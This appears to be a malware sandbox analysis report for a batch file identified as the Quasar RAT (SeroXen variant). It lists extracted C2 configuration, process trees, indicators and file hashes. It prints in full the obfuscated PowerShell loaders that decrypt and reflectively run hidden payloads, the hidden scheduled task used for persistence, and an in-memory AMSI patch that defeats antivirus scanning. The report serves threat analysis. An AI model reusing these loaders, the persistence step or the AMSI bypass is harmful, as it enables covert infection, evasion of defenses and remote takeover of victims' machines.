Overview

overview

10

Static

static

1

$sxr-Uni.bat

windows10-1703-x64

10

$sxr-Uni.bat

windows10-2004-x64

10

$sxr-Uni.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    90s
  • max time network
    176s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-06-2024 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    $sxr-Uni.bat

  • Size

    723KB

  • MD5

    beb1362e7de769ce5332ea614d48b508

  • SHA1

    3b8db446968c37b66df57c21868331ae2a63d716

  • SHA256

    3785896edb293ff81a5d511d761602739e712118aaf8e5e78986e389eb8cbd25

  • SHA512

    8a52b4e50d49498288da73fe2b0ea12d67a0fadda4697b6adb6151cd65c33fddf3d4829d3fdda1dea56b65c7f5b7abe0bd20452ba40f7d3f2fcd4b8d69bc6830

  • SSDEEP

    12288:e8vdejMeNYAAibWDLHPZyYNnOXydab+vGrtdF6YZ4J4H1EmpyL1IuHpk8:eAdeVwDLvDNOXyd0xdz4J4H1E9L1I0

Score
10/10
quasarseroxen | v3.1.5 |executionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen | v3.1.5 |

C2

runderscore00-61208.portmap.host:61208

Mutex

$Sxr-jy6vh8CtEJL5ceZuIb

Attributes
  • encryption_key

    Q6KDujSVF3q2D64a3maQ

  • install_name

    $sxr-powershell.exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

  • startup_key

    Powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2ec532e8-50f2-4d2c-9dc8-de3befc93ecb}
        2⤵
          PID:1364
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3892
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7uctZMFx6G9ucHdptJcO83jS0zyXalW/JF9L2ribdis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNOpQvTMP1KTzAKvCLgIVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tkugM=New-Object System.IO.MemoryStream(,$param_var); $HMuDf=New-Object System.IO.MemoryStream; $ZaAiu=New-Object System.IO.Compression.GZipStream($tkugM, [IO.Compression.CompressionMode]::Decompress); $ZaAiu.CopyTo($HMuDf); $ZaAiu.Dispose(); $tkugM.Dispose(); $HMuDf.Dispose(); $HMuDf.ToArray();}function execute_function($param_var,$param2_var){ $JmmpE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lmGYr=$JmmpE.EntryPoint; $lmGYr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat';$VyxHM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat').Split([Environment]::NewLine);foreach ($iulyk in $VyxHM) { if ($iulyk.StartsWith(':: ')) { $qpkVJ=$iulyk.Substring(3); break; }}$payloads_var=[string[]]$qpkVJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1092
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_534_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_534.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:888
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_534.vbs"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3020
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_534.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1932
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7uctZMFx6G9ucHdptJcO83jS0zyXalW/JF9L2ribdis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNOpQvTMP1KTzAKvCLgIVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tkugM=New-Object System.IO.MemoryStream(,$param_var); $HMuDf=New-Object System.IO.MemoryStream; $ZaAiu=New-Object System.IO.Compression.GZipStream($tkugM, [IO.Compression.CompressionMode]::Decompress); $ZaAiu.CopyTo($HMuDf); $ZaAiu.Dispose(); $tkugM.Dispose(); $HMuDf.Dispose(); $HMuDf.ToArray();}function execute_function($param_var,$param2_var){ $JmmpE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lmGYr=$JmmpE.EntryPoint; $lmGYr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_534.bat';$VyxHM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_534.bat').Split([Environment]::NewLine);foreach ($iulyk in $VyxHM) { if ($iulyk.StartsWith(':: ')) { $qpkVJ=$iulyk.Substring(3); break; }}$payloads_var=[string[]]$qpkVJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4480
                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2912
                • C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe
                  "C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eqLhyvyQKQWM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lnUhchXbqYKxNK,[Parameter(Position=1)][Type]$bEJVjqRfPO)$AWLerbHEZMZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$AWLerbHEZMZ.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+'eB'+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lnUhchXbqYKxNK).SetImplementationFlags('Run'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');$AWLerbHEZMZ.DefineMethod('In'+'v'+'oke',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+'V'+'i'+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$bEJVjqRfPO,$lnUhchXbqYKxNK).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $AWLerbHEZMZ.CreateType();}$iEQIVOesdUwtJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+'3'+''+'2'+''+'.'+''+[Char](85)+'ns'+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+'t'+'h'+'o'+[Char](100)+'s');$JihsZkFosAGiri=$iEQIVOesdUwtJ.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VZBmYUsiVYJspNbztsf=eqLhyvyQKQWM @([String])([IntPtr]);$rmxeaBvRdCTsiFUehBUwkN=eqLhyvyQKQWM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MwkSrXNhCFd=$iEQIVOesdUwtJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'el32.d'+[Char](108)+'l')));$BZPIOPGJBYfUTN=$JihsZkFosAGiri.Invoke($Null,@([Object]$MwkSrXNhCFd,[Object](''+'L'+''+[Char](111)+''+'a'+'dLib'+'r'+'a'+'r'+'y'+[Char](65)+'')));$iCNxQzqiQbTdZMeSh=$JihsZkFosAGiri.Invoke($Null,@([Object]$MwkSrXNhCFd,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'ct')));$KJqiolX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BZPIOPGJBYfUTN,$VZBmYUsiVYJspNbztsf).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$CuDzCzntjXsqEUgqY=$JihsZkFosAGiri.Invoke($Null,@([Object]$KJqiolX,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'iSc'+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+'fer')));$LoycvSbptd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iCNxQzqiQbTdZMeSh,$rmxeaBvRdCTsiFUehBUwkN).Invoke($CuDzCzntjXsqEUgqY,[uint32]8,4,[ref]$LoycvSbptd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CuDzCzntjXsqEUgqY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iCNxQzqiQbTdZMeSh,$rmxeaBvRdCTsiFUehBUwkN).Invoke($CuDzCzntjXsqEUgqY,[uint32]8,0x20,[ref]$LoycvSbptd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+'7'+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4628

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        8ba8fc1034d449222856ea8fa2531e28

        SHA1

        7570fe1788e57484c5138b6cead052fbc3366f3e

        SHA256

        2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

        SHA512

        7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        17KB

        MD5

        1ed6ae24188d4888db6643cadfaadcb6

        SHA1

        94c2152f3a737123725fec173ccc04fcdfb38e9f

        SHA256

        e4a02c78045555ac6d6efa12f4bab3c2fa66ff2d051e50e94fb4889745533c58

        SHA512

        44e81f9daca5aeac0dc87dc1940f9fb58b8ae1251813584ce3708246020ad3b70281afe99660a3a9130c1dbff32bdb2c5c6a94bec7417c21f021cb60205dc7d7

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        Filesize

        163KB

        MD5

        051b3f7c30caf2eedbed29daa6192efb

        SHA1

        a3e0f31e4b4367e5af06f71e7718e7d64ceb250d

        SHA256

        6cd0c5b5b528c15ad28d9f8e44ee2b4e46d8942e8c0592e89c056a3a3661c3b3

        SHA512

        93288a5e145ebf48fb5b536cf331159dad81c1c0458099b5cfc649fddc9a5755739cab9d46c8a3f562dba1ed7ed4852c51eaebd73e9ea8ee28f053df22c74158

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe
        Filesize

        17KB

        MD5

        5ce6714302e7247b1cb7ac7585d75601

        SHA1

        98602182b1aebe260855f8e69e919387d37150c7

        SHA256

        321459d3f0beb05bedead51c1a31a25560e7cb0f6ccb2bb630528fe201580f55

        SHA512

        192ef57e12fe4a794cf6f5c51a97214ecdfe49d85eae8b3c6d47e51c4a84d2cdb9146292c84aaa0f71051e0e350169a967c2c87075ebd5fbbb6ba50a6bd8400e

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ig4gfayz.daj.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\startup_str_534.bat
        Filesize

        723KB

        MD5

        beb1362e7de769ce5332ea614d48b508

        SHA1

        3b8db446968c37b66df57c21868331ae2a63d716

        SHA256

        3785896edb293ff81a5d511d761602739e712118aaf8e5e78986e389eb8cbd25

        SHA512

        8a52b4e50d49498288da73fe2b0ea12d67a0fadda4697b6adb6151cd65c33fddf3d4829d3fdda1dea56b65c7f5b7abe0bd20452ba40f7d3f2fcd4b8d69bc6830

        Download Submit
      • C:\Users\Admin\AppData\Roaming\startup_str_534.vbs
        Filesize

        115B

        MD5

        360bb30336a5b49226d9c4baa5013778

        SHA1

        516b6e0a304b042d7c3d33e166d4bb8236d27cbb

        SHA256

        6b903426d215de176a4e8be2ed0891f4f3933aede3c7a5cbac5abcb6b52ce4e7

        SHA512

        979716eec9d585bb23ec641f5f34df448ff674606d0aefd73bfc69571a3b3ec33b0957276668a97060ccbb01b102be514313e248c0a292740ed14b8c9b137337

        Download Submit
      • memory/888-51-0x0000000007720000-0x0000000007731000-memory.dmp
        Filesize

        68KB

        Download
      • memory/888-55-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/888-52-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/888-35-0x0000000070BD0000-0x0000000070C1C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/888-50-0x00000000077A0000-0x0000000007836000-memory.dmp
        Filesize

        600KB

        Download
      • memory/888-49-0x0000000007590000-0x000000000759A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/888-48-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/888-34-0x0000000007380000-0x00000000073B4000-memory.dmp
        Filesize

        208KB

        Download
      • memory/888-47-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/888-24-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/888-25-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/888-45-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/888-44-0x00000000067B0000-0x00000000067CE000-memory.dmp
        Filesize

        120KB

        Download
      • memory/888-46-0x00000000073D0000-0x0000000007474000-memory.dmp
        Filesize

        656KB

        Download
      • memory/1092-20-0x0000000000C50000-0x0000000000C58000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1092-4-0x0000000004F90000-0x0000000004FB2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1092-21-0x0000000006FD0000-0x0000000007060000-memory.dmp
        Filesize

        576KB

        Download
      • memory/1092-0-0x00000000749EE000-0x00000000749EF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1092-19-0x0000000006E90000-0x0000000006EAA000-memory.dmp
        Filesize

        104KB

        Download
      • memory/1092-18-0x0000000007570000-0x0000000007BEA000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/1092-17-0x0000000005D60000-0x0000000005DAC000-memory.dmp
        Filesize

        304KB

        Download
      • memory/1092-16-0x0000000005D30000-0x0000000005D4E000-memory.dmp
        Filesize

        120KB

        Download
      • memory/1092-15-0x0000000005890000-0x0000000005BE7000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/1092-6-0x0000000005820000-0x0000000005886000-memory.dmp
        Filesize

        408KB

        Download
      • memory/1092-5-0x0000000005130000-0x0000000005196000-memory.dmp
        Filesize

        408KB

        Download
      • memory/1092-1-0x0000000002950000-0x0000000002986000-memory.dmp
        Filesize

        216KB

        Download
      • memory/1092-2-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/1092-73-0x00000000749E0000-0x0000000075191000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/1092-3-0x00000000051F0000-0x000000000581A000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/1092-22-0x000000000A1A0000-0x000000000A746000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/1364-110-0x0000000140000000-0x0000000140008000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1364-113-0x0000000140000000-0x0000000140008000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1364-111-0x0000000140000000-0x0000000140008000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1364-112-0x0000000140000000-0x0000000140008000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1364-115-0x0000000140000000-0x0000000140008000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1364-116-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/1364-117-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp
        Filesize

        756KB

        Download
      • memory/4480-79-0x00000000077E0000-0x0000000007872000-memory.dmp
        Filesize

        584KB

        Download
      • memory/4480-106-0x0000000007960000-0x000000000796A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/4480-104-0x000000000A7A0000-0x000000000A7DC000-memory.dmp
        Filesize

        240KB

        Download
      • memory/4480-94-0x0000000004E70000-0x0000000004E82000-memory.dmp
        Filesize

        72KB

        Download
      • memory/4480-78-0x00000000076B0000-0x000000000771C000-memory.dmp
        Filesize

        432KB

        Download
      • memory/4628-109-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp
        Filesize

        756KB

        Download
      • memory/4628-108-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4628-107-0x0000018DFD6E0000-0x0000018DFD70A000-memory.dmp
        Filesize

        168KB

        Download
      • memory/4628-95-0x0000018DFD310000-0x0000018DFD332000-memory.dmp
        Filesize

        136KB

        Download